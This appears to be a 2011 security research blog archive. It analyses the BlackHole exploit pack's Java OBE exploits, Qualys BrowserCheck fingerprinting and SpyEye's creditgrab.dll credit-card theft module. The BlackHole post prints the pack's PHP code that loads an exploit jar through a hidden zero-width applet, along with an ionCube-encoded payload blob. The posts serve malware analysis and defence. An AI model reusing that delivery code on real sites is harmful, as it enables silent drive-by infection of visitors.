Monday, February 21, 2011

Java OBE + BlackHole - Dead Man Rising



BlackHole exploit pack is showing heavy increase in malware infections across web. The interesting fact that BlackHole presents is the use of Java OBE (Open Business Engine) in spreading exploits and successfully loading the malicious executable in the victim machine.

What is OBE?
:"OBE is a flexible, modular, standards-compliant Open Source Java workflow engine. It is fully J2EE compliant, and supports several J2EE application servers, operating systems and databases. It faithfully implements Workflow Management Coalition Open Standards (WfMC), to which it offers a variety of extensions and enhancements. OBE is equally suited to embedded or standalone deployment."

More details can be found here

However, BlackHole is using fully functional Java OBE Toolkit in order to exploit plethora of systems. Our latest analysis unleash this point that Java OBE holds the maximum rate of successfully exploiting the targets. BlackHole exploit pack shows this behavior where Java OBE Toolkit is devastating victim machines at rapid pace than any other exploits.

The exploit served by Java OBE is the CVE-2010-0840 and CVE-2010-0842

As stated by Zero Day Initiative: Authentication is not required to exploit this vulnerability.The specific flaw exists within the code responsible for ensuring proper privileged execution of methods. If an untrusted method in an applet attempts to call a method that requires privileges,Java will walk the call stack and for each entry verify that the method called is defined within a class that has that privilege.

BlackHole exploit pack uses following PHP code to link to the exploit
?php
include_once 'config.php';
echo ' Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1"
PARAM NAME="URL" VALUETYPE="ref" VALUE="';
echo $config_url . '/exploits/Java-2010-0842Helper.php';
echo '">
/applet>';
?


Th exploit is encodes with PHP IonCube encoder as follows

?php //0035e
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='/ioncube/ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');$__oid=$__id=realpath(ini_get('extension_dir'));
$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).
$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}@dl($__ln);}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo
('Site error: the file '.__FILE__.' requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);
?>

4+oV54zQTAi0e4oDtExXY1DjnASpODJTLQWezUOr9eSc/QY6HTb4vd+rZpF1HHTh0Khql7iEBD8o
iHXqZlUSsNYne9MWqG5vGyPF8ndLDo/Ctc2nWyKPRPmYovkVWIhmzruI9fbg2mVjfc84zaSvSFuN
zXKHmSbl+AoJo6UChrvdCB8b2wQEepAhplIZW1fEX5jdI73K0aILHly7rmYA0DxVC7IIG81zhT37
quMA5arzCs3LYUshSwjHlbWT63Un0It0T59cuYZxSlhY3osq1fqGxeAlzJ/8gMXCr8bMvhQ00VcE
sLkaLKgxBf9elSC4pPQ8yN4Ajtbk63NI1k/VPoN8c1bogVgD81STXlMlcnXV/BhsGcj0EcM4nRav
twLKKBIHXDqgVWQOpFvlhumeM9KLQu6bbOuZYYos/tOsCLyRauiChV8vQdWndia8XGK7bjoc9vri
RwDG5R4I+LYhp1ajtvbfoWafYMD+tJcMtwn+GGkNDWEa8SDhrYc5foPERsptZDbduKlXIfmuKHMs
i3iBo4o9ncsSSRIm2EwrrqG9GoWRfOeTMaCQFKHMrRH3xK+GTe9sMDLsC3bWMfeU1/js8nAMshnJ
uD3JEvPvENBByeVjawcuITCXUi7us4RQ7xlPaUgQ5zn8KleXH30qErLCyu1+imafdPVFbvhyj0B6
owIoTC0eVD2/qF2A5MMQOJ86uSyn+TU7zL39Xak43NVE8K7pFi+PSYPqXKMFPu4gZuNy97fZxnJu
X5nENhyhotklpg3Qt9yabDVdSDSDFZyV4BHH17w5uAj7eEj7uupXU0JlnYccdhU1O65Ncy2lhUjW
JSC4a36ucKA/xgssB+JqZ3AUZjdH4Jwn89HfexDfcN9tkBDQ9KcWVJJ3hm+HYvW98yc3pOkYOb8S
2HG1AqKLoe7Hs5F3IQT5gS2Vy4iZjVNMj6ZHrpFZ7PNg/Bmhs11Ihz7MBk3uqdamXcSNzb4DvTIN
7pGIMBaMw84Px89GKeKJFJz9xGk5RPtIJehUf7xm64zbGJNyA5XkStpph7OF0eXL6vKTUnEuvwWV
sK0qf/ssfSdC9C5bABVnxZRi6Ehf4Ss7pizy8U417HVSeaYHrFUGtnUifK41MkJMBH7TlccNm7fP
0yAslR7TMtcjkTD9RC1LjjfTTLocpsYSH2pKSVaa/MqMr0jPyafCZrv5qkwlgWOlKvlUDwussRUp
p7bP6MsCw7bCVFHg5S5fjb/W9AxdK9H51aNeotbWAj6ht/wodBNqG/mN9MmB9ejBWC3HnrXTHwkI
R6jKOIbHEk3d1A50RjL0L93EtCVUaJv2GpIyYsKIsWNuc00JdXifz4vvKttF1S929jzbaWq7wAyk
uHu3SmmjBkQ+wDLIR6ghdwCVspTpbb6IiFYWYKjhFmxeOsQ2tuieEG6CRMbm0hZsuwwUrrtKEZ5r
JaQqtN2zSVpAXfQMYf/vACAZdbdroX17DgDLDWz/lpWSTGbQlCPteycgmgNn9J3PAkSkXwY81PNU
0WBSbxSP6s80Q4lye1IbFfltV/Doyw5HFR+vF+vGUzcepkPif58TruwNlFt4jFuj/6+SosDV4xn9
wnYf+KjWw95keiR5zBaFd194ens3GdmLibpooN4=


This exploit can be found in the wild on the World Wide Web. During our analysis, exploit specific stats are checked for the infected domain hosting BlackHole exploit pack. The comparative ratio is presented below



This scenario shows the ease of exploiting Java open engine.In this, only BlackHole exploit pack is analyzed, what about other exploit packs. It seems like Java is becoming the preferred base for exploitation because of platform independent nature.

Saturday, February 19, 2011

BrowserCheck - Malware Driven Retrospective



Recently, we came across the new browser security tool released by QUALYS termed as BrowserCheck . In general, this tool scrutinizes and verifies the state of plug-ins in Mozilla browser. As stated in the information week article "Less-than-current browser and plug-in versions can leave your browsing unnecessarily vulnerable to web-based attacks... and make latest-and-greatest-based web sites harder or impossible to use, but Qualys' free BrowserCheck can help."

Well, in general the tool is designed as a simple version based signature tool. However, the tool uses a PHP based version verifier script that runs on server side. An appropriate XMLHttpRequest is used to send the browser based information which we termed as User Agent Based Fingerprinting (UABF).

Conversely, this technique is used in the wild by all the classes of malware to detect the state of browsers (version, addons, plug-ins etc). Apart from this, malware is served based on the type of version running. A similar plug-in detection script can be compiled using navigator object as



Further, it is also detected that the tool is using JavaScript + XMLHTTPRequest collectively to find the information from client machine. During the course of testing, we conducted a small test in order to scrutinize whether Java applet is loaded in the system or not in order to verify the semantics of tool. Generally, Java plug-in version can be checked by using a simple Java applet as follows

import java.applet.*;
import java.awt.*;
public class JavaVersionDisplayApplet extends Applet
{ private Label m_labVersionVendor;
public JavaVersionDisplayApplet() //constructor
{
m_labVersionVendor = new Label (" Java Version: " +
System.getProperty("java.version")+
" from "+System.getProperty("java.vendor"));
this.add(m_labVersionVendor);
}
}


The Java client side environment is not triggered on the test machine which clearly indicates that fingerprinting is done using simple tactics. While running the tool on one of our test bed machines, we found that the data is transferred as

{"ScanInfo":
{"Platform":"Microsoft Windows Vista Home Premium Edition, 64-bit Service Pack 2","Browser":"Mozilla Firefox 3.6.13","AgentVer":"1.1.95.1","SADllVer":"1.1.95.1","InstanceId":"72904d0d-a58e-409d-afa3-922d1c8a71cd","ScanId":"5"},

"ScanResults":[{"Status":"Up To Date","ItemType":"Browser","ItemName":"Mozilla Firefox","FoundVer":"3.6.13","ProductVer":"3.6.13","RequiredVer":"3.6.13.0",
"FixInfo":"http://www.mozilla.com/en-US/firefox/upgrade.html"},


{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Adobe Flash Player","FoundVer":"10.2.152.26","InstalledFile":"c:\\windows\\syswow64
\\macromed\\flash \npswf32.dll","ProductVer":"10.2.152.26","RequiredVer":"10.2.152.26",
"AdvisoryUrl":"http://www.adobe.com/support/security/advisories/apsa10-05.html","AddonType":"Plugin","FixInfo":"http://fpdownload.adobe.com/get/flashplayer/current/install_flash_player.exe"},

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Adobe Reader","FoundVer":"10.0.1.434","InstalledFile":"c:\\program files
(x86)\\adobe\\reader 10.0\\reader\\browser \\nppdf32.dll","ProductVer":"10.0.1.434","RequiredVer":"10.0.1.434",
"AddonType":"Plugin","FixInfo":"http://get.adobe.com/reader"},


{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Java Runtime","FoundVer":"1.6.0_22","ProductVer":"1.6.0_22",
"RequiredVer":"1.6.0_24","RecommendedVer":"Latest Version of Java","AddonType":"Plugin","FixInfo":"http://www.java.com/getjava/index.jsp"},


{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Microsoft Silverlight","FoundVer":"4.0.60129.0","InstalledFile":"c:\\program files (x86)\\microsoft silverlight\\4.0.60129.0\\npctrl.dll","ProductVer":"4.0.60129.0","RequiredVer":"4.0.60129.0",
"AddonType":"Plugin","FixInfo":"http://www.microsoft.com/getsilverlight/handlers/getsilverlight.ashx"},

{"Status":"NA","ItemType":"Browser Extra","ItemName":"Microsoft
Windows Presentation Foundation","FoundVer":"3.5.30729.1","InstalledFile":"",
"ProductVer":"3.5.30729.1","RequiredVer":"3.5.30729.1",
"AddonType":"Plugin","FixInfo":"http://www.microsoft.com/downloads/"},

{"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Microsoft
Windows Media Player","FoundVer":"11.0.6002.18311","InstalledFile":"C:\\Windows\\system32\\wmp.dll","ProductVer":"11.0.6002.18311",
"RequiredVer":"11.0.6002.18311","AddonType":"Plugin",
"FixInfo":"http://www.microsoft.com/downloads/en/confirmation.aspx?
familyid=277151A2-B74F-4DA6-8203-E774AF75E44C&displaylang=en"}]}


This scan info completely leverages the working stature of the tool. However, the technique is not new but one can notice that signature based tools are still widely used.

The next question is to see the way this tool reacts when a malicious plug-in (having updated version information) is installed in the browser.

Monday, February 14, 2011

HITB Paper - Shared Hosting Infections

HITB issue 5 talks about our paper on "Shared Hosting Malware Infections". FETCH here.

Sunday, February 6, 2011

SpyEye CreditGrab.dll Module - Plugin Analysis


In our last post about SpyEye backend collector, we discussed about the the data transference mechanism in SpyEye botnet framework. SpyEye uses creditgrab.dll in order take care of the data that is stolen from the requisite credit cards from victim machines. However, last time we talked about the source code analysis. In order to support the point, we recently came across the dynamic link libraries for different modules. In this post, we are going to talk about the creditgrab.dll.

The DLL main function is designed as follows


At first part, Credit Grab Module (CGM) is designed to get the bot information with a guid reference. This bot guid is used to keep a track of the infection occur in the victim machine and the requisite credit card information stolen from that machine. The code snippet presented below shows this fact





The function "TakeBotGuid" is used in conjunction with the CGM. In this particular function, bot guid is checked. The "repne scasb" instruction keep on checking the string for NULL terminated value there by decrementing the counter (dec ecx). If the carry ( jnb short loc_1000167D) value (carry=0)is zero, the function jumps to the required address which points to the bot guid "unknown".

The gate collector function TakeGateToCollector is structured as follows

void TakeGateToCollector(LPVOID lpGateFunc);
typedef void (*GATETOCOLLECTOR)(IN PBYTE pbData, IN DWORD dwSize);




The next function that plays a critical role in hijacking the HTTP communication channel is Callback_OnBeforeLoadPage. The code snippet taken from this function is presented below



The function loads the bot guid, URI and data by calling a same sub routine as "sub_10001370", which is an appropriate string checking and terminating routine to scrutinize appropriate parameters passed to the SpyEye function.



The above presented snippet from the code shows the dissection of strings. The "strstr" and "strtok" functions are used together to find similar patterns and separating string from tokens ("&"). Basically, in this function it is used for URL dissection and collection of data from a raw source (i.e. information extraction from raw HTTP content). The XREF structure of the plugin module is traced below



So this post clearly indicates the data collection working of SpyEye bot by analyzing a specific DLL sample.

We will be covering the analysis of other modules (some new ones) in upcoming posts.